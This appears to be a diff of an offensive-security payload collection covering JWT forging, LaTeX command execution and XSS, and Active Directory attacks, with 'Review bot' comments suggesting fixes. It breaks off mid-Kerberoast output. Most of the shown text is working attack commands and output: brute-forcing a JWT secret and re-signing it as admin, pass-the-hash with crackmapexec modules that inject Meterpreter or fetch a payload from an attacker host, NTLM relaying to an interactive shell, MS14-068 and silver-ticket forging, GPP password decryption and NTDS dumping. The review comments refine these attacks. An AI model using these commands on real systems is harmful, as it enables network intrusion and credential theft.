> JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed. > JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed.
## Summary
- JWT Format
- JWT Signature - None algorithm
- JWT Signature - RS256 to HS256
- Breaking JWT's secret
## Tools
- [jwt_tool](https://github.com/ticarpi/jwt_tool)
- [c-jwt-cracker](https://github.com/brendan-rius/c-jwt-cracker)
- [JOSEPH - JavaScript Object Signing and Encryption Pentesting Helper](https://portswigger.net/bappstore/82d6c60490b540369d6d5d01822bdf61)
## JWT Format ## JWT Format
JSON Web Token : `Base64(Header).Base64(Data).Base64(Signature)` JSON Web Token : `Base64(Header).Base64(Data).Base64(Signature)`
Example : `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkFtYXppbmcgSGF4eDByIiwiZXhwIjoiMTQ2NjI3MDcyMiIsImFkbWluIjp0cnVlfQ.UL9Pz5HbaMdZCV9cS9OcpccjrlkcmLovL2A2aiKiAOY` Example : `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkFtYXppbmcgSGF4eDByIiwiZXhwIjoiMTQ2NjI3MDcyMiIsImFkbWluIjp0cnVlfQ.UL9Pz5HbaMdZCV9cS9OcpccjrlkcmLovL2A2aiKiAOY`
Where we can split it into 3 components separated by a dot.
```powershell
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 # header
eyJzdWIiOiIxMjM0[...]kbWluIjp0cnVlfQ # payload
UL9Pz5HbaMdZCV9cS9OcpccjrlkcmLovL2A2aiKiAOY # signature
```
### Header ### Header
Default algorithm is "HS256" (HMAC SHA256 symmetric encryption). Default algorithm is "HS256" (HMAC SHA256 symmetric encryption).
"RS256" is used for asymetric purposes (RSA asymmetric encryption and private key signature). "RS256" is used for asymmetric purposes (RSA asymmetric encryption and private key signature).
```json ```json
{ {
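Review bot: this hunk fixes the "asymetric" typo on the two algorithm lines but keeps the wrong terminology. HS256 is an HMAC (a keyed hash used as the signature), not "symmetric encryption", and RS256 is an RSA signature (RSASSA-PKCS1-v1_5 over SHA-256), not "RSA asymmetric encryption"; nothing in a signed JWT is encrypted, the header and payload are only base64url-encoded, which is also why `Base64(Header).Base64(Data).Base64(Signature)` should read base64url. Suggested wording: `Default algorithm is "HS256" (HMAC with SHA-256, one shared key)` and `"RS256" signs with an RSA private key and is verified with the matching public key`. Getting this right matters for the RS256-to-HS256 section the summary announces, since that attack only makes sense once the reader sees the public key becoming the HMAC key.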
@@ -31,6 +52,15 @@ Default algorithm is "HS256" (HMAC SHA256 symmetric encryption).
} }
``` ```
Claims are the predefined keys and their values:
- iss: issuer of the token
- exp: the expiration timestamp (reject tokens which have expired). Note: as defined in the spec, this must be in seconds.
- iat: The time the JWT was issued. Can be used to determine the age of the JWT
- nbf: "not before" is a future time when the token will become active.
- jti: unique identifier for the JWT. Used to prevent the JWT from being re-used or replayed.
- sub: subject of the token (rarely used)
- aud: audience of the token (also rarely used)
JWT Encoder Decoder: `http://jsonwebtoken.io` JWT Encoder Decoder: `http://jsonwebtoken.io`
## JWT Signature - None algorithm ## JWT Signature - None algorithm
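Review bot: marking `sub` and `aud` as "(rarely used)" is misleading in a list a tester will use as a verification checklist. `aud` is the claim a verifier must check to stop a token minted for one service being accepted by another, and `sub` is the standard identity claim, so drop both qualifiers. For `exp`, `nbf` and `iat` it is worth saying the value is a NumericDate (seconds since the epoch, as the note on `exp` already hints) and that a string value such as the `"exp":"1466270722"` in the example token above is rejected by strict libraries. The `jsonwebtoken.io` link should be https.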
@@ -109,9 +139,66 @@ jwt.decode(encoded, 'Sn1f', algorithms=['HS256']) # decode with 'Sn1f' as the se
### JWT tool ### JWT tool
```bash First, bruteforce the "secret" key used to compute the signature.
```powershell
git clone https://github.com/ticarpi/jwt_tool git clone https://github.com/ticarpi/jwt_tool
python jwt_tool.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.aqNCvShlNT9jBFTPBpHDbt2gBB1MyHiisSDdp8SQvgw /usr/share/wordlists/rockyou.txt python2.7 jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6InVzZXIiLCJpYXQiOjE1MTYyMzkwMjJ9.1rtMXfvHSjWuH6vXBCaLLJiBghzVrLJpAQ6Dl5qD4YI /tmp/wordlist
Token header values:
[+] alg = HS256
[+] typ = JWT
Token payload values:
[+] sub = 1234567890
[+] role = user
[+] iat = 1516239022
File loaded: /tmp/wordlist
Testing 5 passwords...
[+] secret is the CORRECT key!
```
Then edit the field inside the JSON Web Token.
```powershell
Current value of role is: user
Please enter new value and hit ENTER
> admin
[1] sub = 1234567890
[2] role = admin
[3] iat = 1516239022
[0] Continue to next step
Please select a field number:
(or 0 to Continue)
> 0
```
Finally, finish the token by signing it with the previously retrieved "secret" key.
```powershell
Token Signing:
[1] Sign token with known key
[2] Strip signature from token vulnerable to CVE-2015-2951
[3] Sign with Public Key bypass vulnerability
[4] Sign token with key file
Please select an option from above (1-4):
> 1
Please enter the known key:
> secret
Please enter the keylength:
[1] HMAC-SHA256
[2] HMAC-SHA384
[3] HMAC-SHA512
> 1
Your new forged token:
[+] URL safe: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.xbUXlOQClkhXEreWmB3da_xtBsT0Kjw7truyhDwF5Ic
[+] Standard: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.xbUXlOQClkhXEreWmB3da/xtBsT0Kjw7truyhDwF5Ic
``` ```
### JWT cracker ### JWT cracker
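Review bot: of the two forged tokens printed at the end of the walkthrough, only the "URL safe" one is a valid JWT. The "Standard" variant carries a `/` in its signature (`...da/xtBsT0...`) and JWS requires base64url without padding (RFC 7515), so a compliant verifier will reject it; say that instead of presenting both as usable. The command line is `python2.7 jwt_tool.py`, which pins the steps to Python 2, and `/tmp/wordlist` is never shown; a sentence stating it is a short wordlist that contains `secret` would make the "Testing 5 passwords" and "secret is the CORRECT key!" output self-explanatory. Finally, the edit step jumps straight to "Current value of role is: user"; show the field-selection prompt that precedes it so the reader knows how `role` was chosen.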
@@ -131,7 +218,7 @@ Secret is "Sn1f"
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret
``` ```
## Thanks ## References
- [Hacking JSON Web Token (JWT) - Hate_401](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6) - [Hacking JSON Web Token (JWT) - Hate_401](https://medium.com/101-writeups/hacking-json-web-token-jwt-233fe6c862e6)
- [WebSec CTF - Authorization Token - JWT Challenge](https://ctf.rip/websec-ctf-authorization-token-jwt-challenge/) - [WebSec CTF - Authorization Token - JWT Challenge](https://ctf.rip/websec-ctf-authorization-token-jwt-challenge/)
@@ -139,3 +226,9 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret
- [5 Easy Steps to Understanding JSON Web Token](https://medium.com/vandium-software/5-easy-steps-to-understanding-json-web-tokens-jwt-1164c0adfcec) - [5 Easy Steps to Understanding JSON Web Token](https://medium.com/vandium-software/5-easy-steps-to-understanding-json-web-tokens-jwt-1164c0adfcec)
- [Hacking JSON Web Tokens - From Zero To Hero Without Effort - Websecurify Blog](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html) - [Hacking JSON Web Tokens - From Zero To Hero Without Effort - Websecurify Blog](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html)
- [HITBGSEC CTF 2017 - Pasty (Web) - amon (j.heng)](https://nandynarwhals.org/hitbgsec2017-pasty/) - [HITBGSEC CTF 2017 - Pasty (Web) - amon (j.heng)](https://nandynarwhals.org/hitbgsec2017-pasty/)
- [Critical vulnerabilities in JSON Web Token libraries - March 31, 2015 - Tim McLean](https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries//)
- [Learn how to use JSON Web Tokens (JWT) for Authentication - @dwylhq](https://github.com/dwyl/learn-json-web-tokens)
- [Simple JWT hacking - @b1ack_h00d](https://medium.com/@blackhood/simple-jwt-hacking-73870a976750)
- [Attacking JWT authentication - Sep 28, 2016 - Sjoerd Langkemper](https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/)
- [How to Hack a Weak JWT Implementation with a Timing Attack - Jan 7, 2017 - Tamas Polgar](https://hackernoon.com/can-timing-attack-be-a-practical-security-threat-on-jwt-signature-ba3c8340dea9)
- [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html)
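Review bot: the Websecurify post is now listed twice: "Hacking JSON Web Tokens - From Zero To Hero Without Effort - Websecurify Blog" and "HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - @pdp" both point at `blog.websecurify.com/2017/02/hacking-json-web-tokens.html`. Keep one entry. The auth0 URL also ends in a doubled slash (`libraries//`).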

View File

@@ -96,7 +96,7 @@ userPassword:2.5.13.18:=\xx\xx
userPassword:2.5.13.18:=\xx\xx\xx userPassword:2.5.13.18:=\xx\xx\xx
``` ```
## Thanks to ## References
* [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection) * [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection)
* [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/) * [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/)

LICENSE Normal file
View File

@@ -0,0 +1,21 @@
MIT License
Copyright (c) 2019 Swissky
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

View File

@@ -66,7 +66,17 @@ If you get any LaTex error, consider using base64 to get the result without bad
\input{|"/bin/hostname"} \input{|"/bin/hostname"}
``` ```
## Thanks to ## Cross Site Scripting
From [@EdOverflow](https://twitter.com/intigriti/status/1101509684614320130)
```bash
\url{javascript:alert(1)}
\href{javascript:alert(1)}{placeholder}
```
Live example at `http://payontriage.com/xss.php?xss=$\href{javascript:alert(1)}{Frogs%20find%20bugs}$`
## References
* [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/) * [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/)
* [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a) * [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a)
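Review bot: the new Cross Site Scripting section should state where the payload actually fires. `\url{javascript:alert(1)}` and `\href{javascript:alert(1)}{placeholder}` only execute when the LaTeX is rendered into HTML (or into a PDF whose viewer follows link annotations) and the resulting link is clicked; in a text or image render they are inert, so a tester needs to identify the output format first. The "Live example" depends on a third-party host (`payontriage.com`) that may go away; keep the payload as the primary content and label the URL as an external demo.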

View File

@@ -13,15 +13,15 @@
* [Silver Tickets](#passtheticket-silver-tickets) * [Silver Tickets](#passtheticket-silver-tickets)
* [Trust Tickets](#trust-tickets) * [Trust Tickets](#trust-tickets)
* [Kerberoast](#kerberoast) * [Kerberoast](#kerberoast)
* [KRB_AS_REP roasting](#krb_as_rep-roasting)
* [Pass-the-Hash](#pass-the-hash) * [Pass-the-Hash](#pass-the-hash)
* [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key) * [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
* [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes)
* [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying)
* [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage) * [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
* [Trust relationship between domains](#trust-relationship-between-domains) * [Trust relationship between domains](#trust-relationship-between-domains)
* [Privilege Escalation](#privilege-escalation) * [PrivExchange attack](#privexchange-attack)
* [PrivEsc Local Admin - Token Impersonation (RottenPotato)](#privesc-local-admin---token-impersonation-rottenpotato) * [Password spraying](#password-spraying)
* [PrivEsc Local Admin - MS16-032](#privesc-local-admin---ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64)
* [PrivEsc Local Admin - MS17-010 (Eternal Blue)](#privesc-local-admin---ms17-010-eternal-blue)
* [From Local Admin to Domain Admin](#from-local-admin-to-domain-admin)
## Tools ## Tools
@@ -37,8 +37,11 @@
Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
./bloodhound ./bloodhound
SharpHound.exe (from resources/Ingestor) SharpHound.exe (from resources/Ingestor)
SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100
or or
Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
or
bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all
``` ```
* [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer) * [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer)
@@ -48,11 +51,25 @@
git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
crackmapexec smb -L crackmapexec smb -L
crackmapexec smb -M name_module -o VAR=DATA crackmapexec smb -M name_module -o VAR=DATA
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --local-auth
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443 crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload" crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami' crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
crackmapexec mimikatz --server http --server-port 80
```
* [Mitm6](https://github.com/fox-it/mitm6.git)
```bash
git clone https://github.com/fox-it/mitm6.git && cd mitm6
pip install .
mitm6 -d lab.local
ntlmrelayx.py -wh 192.168.218.129 -t smb://192.168.218.128/ -i
# -wh: Server hosting WPAD file (Attackers IP)
# -t: Target (You cannot relay credentials to the same device that youre spoofing)
# -i: open an interactive shell
``` ```
* [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon) * [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
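Review bot: `crackmapexec mimikatz --server http --server-port 80` is not a valid invocation: `mimikatz` is a module, not a protocol, and no target is given. It should follow the `-M name_module` form shown a few lines above, e.g. `crackmapexec smb <target> -u <user> -p <pass> -M mimikatz --server http --server-port 80`. In the mitm6 comments, "youre" should be "you are", and the `-i` comment should add that the interactive shell only appears after a successful relay, which needs a target with SMB signing disabled, the same condition stated in the NTLMv2 relaying section later in this file.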
@@ -64,31 +81,135 @@
* [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script) * [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script)
```powershell
powershell.exe -ExecutionPolicy Bypass ./ADAPE.ps1
```
* [Ping Castle](https://github.com/vletoux/pingcastle)
```powershell
pingcastle.exe --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --password <PASSWORD> --advanced-live --nullsession
```
* [Kerbrute](https://github.com/ropnop/kerbrute)
```powershell
./kerbrute passwordspray -d <DOMAIN> <USERS.TXT> <PASSWORD>
```
## Most common paths to AD compromise ## Most common paths to AD compromise
### MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability) ### MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)
```bash This exploit require to know the user SID, you can use `rpcclient` to remotely get it or `wmi` if you have an access on the machine.
Exploit Python: https://www.exploit-db.com/exploits/35474/
Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
git clone https://github.com/bidord/pykek ```powershell
# remote
rpcclient $> lookupnames john.smith
john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1)
# loc
wmic useraccount get name,sid
Administrator S-1-5-21-3415849876-833628785-5197346142-500
Guest S-1-5-21-3415849876-833628785-5197346142-501
Administrator S-1-5-21-297520375-2634728305-5197346142-500
Guest S-1-5-21-297520375-2634728305-5197346142-501
krbtgt S-1-5-21-297520375-2634728305-5197346142-502
lambda S-1-5-21-297520375-2634728305-5197346142-1110
```
```bash
Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
```
Generate a ticket with `metasploit` or `pykek`
```powershell
Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN LABDOMAIN.LOCAL yes The Domain (upper case) Ex: DEMO.LOCAL
PASSWORD P@ssw0rd yes The Domain User password
RHOSTS 10.10.10.10 yes The target address range or CIDR identifier
RPORT 88 yes The target port
Timeout 10 yes The TCP timeout to establish connection and read data
USER lambda yes The Domain User
USER_SID S-1-5-21-297520375-2634728305-5197346142-1106 yes The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
```
```powershell
# https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek
git clone https://github.com/SecWiki/windows-kernel-exploits
python ./ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword> python ./ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword>
python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org
python ./ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10
```
Then use `mimikatz` to load the ticket.
```powershell
mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache" mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
``` ```
## Open Shares :warning: If the clock is skewed use `clock-skew.nse` script from `nmap`
```powershell
$ nmap -sV -sC 10.10.10.10
clock-skew: mean: -1998d09h03m04s, deviation: 4h00m00s, median: -1998d11h03m05s
$ sudo date -s "14 APR 2015 18:25:16"
```
### Open Shares
```powershell
smbmap -H 10.10.10.10 # null session
smbmap -H 10.10.10.10 -R # recursive listing
smbmap -H 10.10.10.10 -u invaliduser # guest smb session
smbmap -H 10.10.10.10 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
```
or
```powershell ```powershell
pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
ls # list files pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/C$
cd ls # list files
cd # move inside a folder
get # download files get # download files
put # replace a file put # replace a file
``` ```
or
```powershell
smbclient -I 10.10.10.100 -L ACTIVE -N -U ""
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
use Sharename # select a Sharename
cd Folder # move inside a folder
ls # list files
```
Download a folder recursively
```powershell
smbclient //10.0.0.1/Share
smb: \> mask ""
smb: \> recurse ON
smb: \> prompt OFF
smb: \> lcd '/path/to/go/'
smb: \> mget *
```
Mount a share Mount a share
```powershell ```powershell
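Review bot: the `wmic useraccount get name,sid` output lists two different domain SIDs (`S-1-5-21-3415849876-...` and `S-1-5-21-297520375-...`) as if they came from one command, and the Metasploit `USER_SID` ends in RID 1106 while the `lambda` account shown just above is RID 1110; use one consistent set so the reader can map the wmic output straight into the module option and into the `-s` argument of `ms14-068.py`. Small fixes in the same hunk: "This exploit require" should be "requires", "# loc" should be "# local", and the `Doc:` line sits alone in a bash fence. For the clock-skew tip, say why it matters: Kerberos rejects requests whose timestamp is outside the permitted skew (5 minutes by default), so the attacker's clock has to be set to the DC's time before the ticket request or `kerberos::ptc` will succeed.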
@@ -99,18 +220,21 @@ smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
:triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local :triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local
Find password in SYSVOL Find password in SYSVOL (MS14-025)
```powershell ```powershell
findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
``` ```
Decrypt a Group Policy Password found in SYSVOL (by [0x00C651E0](https://twitter.com/0x00C651E0/status/956362334682849280)) Decrypt a Group Policy Password found in SYSVOL (by [0x00C651E0](https://twitter.com/0x00C651E0/status/956362334682849280)), using the 32-byte AES key provided by Microsoft in the [MSDN - 2.2.1.1.4 Password Encryption](https://msdn.microsoft.com/en-us/library/cc422924.aspx)
```bash ```bash
echo 'password_in_base64' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000 echo 'password_in_base64' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
e.g: echo '5OPdEKwZSf7dYAvLOe6RzRDtcvT/wCP8g5RqmAgjSso=' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000 e.g:
echo '5OPdEKwZSf7dYAvLOe6RzRDtcvT/wCP8g5RqmAgjSso=' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
``` ```
Metasploit modules to enumerate shares and credentials Metasploit modules to enumerate shares and credentials
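Review bot: the second cpassword example (`edBSHOwh...NglVmQ`) is 86 characters with no `=` padding, which is how GPP stores it, so `base64 -d` from GNU coreutils fails with "invalid input" before `openssl` ever runs; the first example (`...AgjSso=`) happens to be padded, which is why only one of the two works as pasted. Either append `==` to that value or add a sentence telling the reader to pad the string to a multiple of 4 before decoding. Labelling the technique MS14-025 and citing the Microsoft-published key is the right call.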
@@ -152,6 +276,12 @@ ifm: quit
ntdsutil: quit ntdsutil: quit
``` ```
or
```powershell
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
```
#### Using Vshadow #### Using Vshadow
```powershell ```powershell
@@ -235,6 +365,13 @@ cme smb 10.10.0.202 -u username -p password --ntds vss
enum4linux | grep -i desc enum4linux | grep -i desc
There are 3-4 fields that seem to be common in most AD schemas: There are 3-4 fields that seem to be common in most AD schemas:
UserPassword, UnixUserPassword, unicodePwd and msSFU30Password. UserPassword, UnixUserPassword, unicodePwd and msSFU30Password.
Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID
```
or dump the Active Directory and `grep` the content.
```powershell
ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/
``` ```
### PassTheTicket Golden Tickets ### PassTheTicket Golden Tickets
@@ -288,7 +425,7 @@ cat $KRB5CCNAME
NOTE: You may need to comment the proxy_dns setting in the proxychains configuration file NOTE: You may need to comment the proxy_dns setting in the proxychains configuration file
./psexec.py -k -no-pass --dc-ip 192.168.1.1 AD/administrator@192.168.1.100 ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100
``` ```
### PassTheTicket Silver Tickets ### PassTheTicket Silver Tickets
@@ -298,11 +435,12 @@ Forging a TGS require machine accound password (key) from the KDC
```powershell ```powershell
Create a ticket for the service Create a ticket for the service
kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE
/kerberos::golden /domain:adsec.local /user:ANY /sid:S-1-5-21-1423455951-1752654185-1824483205 /rc4:ceaxxxxxxxxxxxxxxxxxxxxxxxxxxxxx /target:DESKTOP-01.adsec.local /service:cifs /ptt
Then use the same steps as a Golden ticket Then use the same steps as a Golden ticket
misc::convert ccache ticket.kirbi misc::convert ccache ticket.kirbi
export KRB5CCNAME=/home/user/ticket.ccache export KRB5CCNAME=/home/user/ticket.ccache
./psexec.py -k -no-pass --dc-ip 192.168.1.1 AD/administrator@192.168.1.100 ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100
``` ```
### Trust Tickets ### Trust Tickets
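Review bot: the added silver-ticket example starts with a stray `/` (`/kerberos::golden ...`), which mimikatz will not accept as a command; remove it. Since that line ends in `/ptt`, the ticket is injected into the current session directly, so the `misc::convert ccache` and `KRB5CCNAME` steps that follow only apply when the ticket is exported for use from Linux; a short note saying which path is which would avoid confusion. The `/sid:` value is correctly the domain SID without a RID suffix, which matches the `DOMAIN-SID` placeholder in the template line above.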
@@ -311,13 +449,69 @@ TODO
### Kerberoast ### Kerberoast
```powershell > "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names)
https://www.exploit-db.com/docs/english/45051-abusing-kerberos---kerberoasting.pdf
https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/
https://room362.com/post/2016/kerberoast-pt1/
./GetUserSPNS.py -request lab.ropnop.com/thoffman:Summer2017 Any valid domain user can request a kerberos ticket for any domain service with `GetUserSPNs`. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as.
(Impacket) Kerberoasting (ldap query, tgs in JTR format)
```powershell
$ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
-------------------- ------------- -------------------------------------------------------- ------------------- -------------------
